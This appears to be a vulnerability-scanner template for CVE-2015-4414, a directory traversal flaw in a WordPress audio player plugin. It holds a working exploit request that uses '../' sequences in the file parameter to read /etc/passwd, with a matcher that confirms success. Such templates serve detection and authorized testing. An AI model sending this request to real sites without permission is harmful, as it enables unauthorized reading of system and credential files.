id: CVE-2015-4414 info: name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal author: daffainfo severity: high description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. reference: - https://www.exploit-db.com/exploits/37274 - https://www.cvedetails.com/cve/CVE-2015-4414 classification: cve-id: CVE-2015-4414 tags: cve,cve2015,wordpress,wp-plugin,lfi requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200